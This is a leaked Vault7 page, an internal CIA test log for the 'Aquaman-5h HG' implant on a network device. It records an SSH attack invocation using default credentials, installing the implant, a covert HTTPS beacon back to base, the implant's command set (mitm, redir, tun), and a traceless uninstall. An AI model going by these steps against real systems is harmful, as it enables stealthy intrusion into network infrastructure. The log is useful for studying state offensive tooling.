Vault7: CIA Hacking Tools Revealed

Navigation: » Latest version
Owner: User #71467
Aquaman-5h HG 3.3.1 - Full Test
Aquaman-5h HG 3.3.1 - Full Test
Xetrron delivered Aquaman-5h HG 3.3.1 with a fix to EAREnterprise Archive 5244 (snooping causing err-disable). Plan is to perform a full test of this Aquaman delivery.
Testing Summary
- Collect Baseline information for use in later comparisons
- Deleted all previous crashinfo files from flash card of Target Device
- Reloaded Target Device
- Collected baseline files with output of show tech, dir all, show mem and CPU, show log
- Used memory - 26975916 (b)
- CPU - 5%/0%; one minute: 6%; five minutes: 6%
- Ran RANCID - collected version 1.6
- Install/Uninstall HG without leave behind
- SSHIAC attack - ./sshiac --ip --l cisco:cisco password
- LG EC-125 DHDiffie-Hellman encryption EC-60 EC-159 M - these codes are acceptable per readme
- Observed CPU during attack: 46% highest spike
- Used memory after SSHIAC attack - 26966496 (b)
- Install HG
- Left the interpacket delay at 1s (not directed to change it in readme, and I'm following the readme)
- hg_start - result success - Result: 0x00000001
- Observed CPU during install: 19% highest CPU spike
- Used memory after HG install - 29893996 (b)
- no commands from attack or install observed in show history
- Establish HG Comms
- Edited aquaman-5h.txt file - replaced <INT> with eth0 and <IP TO TRIGGER> with
- Ran
- Established CTCounter Terrorism session - Observed 19% spike during SSLSecure Socket Layer handshake
- beacon call_base_back https 443
- Used memory after CTCounter Terrorism session - 29863488 (b)
- Hit tab twice:
aliases ca collect device encryption https mitm packet redir tun
beachhead capability communication dns file ilm mode process scramble verbosity
beacon cmd compression ebroker filesystem memory module quit socket web - HG Base version 3.3.1
- Uninstall HG
- device uninstall_hg -mp -f
- no syslog messages generated
- Used memory after uninstall 26954800 (b)
- Observed CPU during uninstall - 12% spike
After uninstall - CPU utilization for five seconds: 5%/0%; one minute: 6%; five minutes: 6%
- SSHIAC attack - ./sshiac --ip --l cisco:cisco password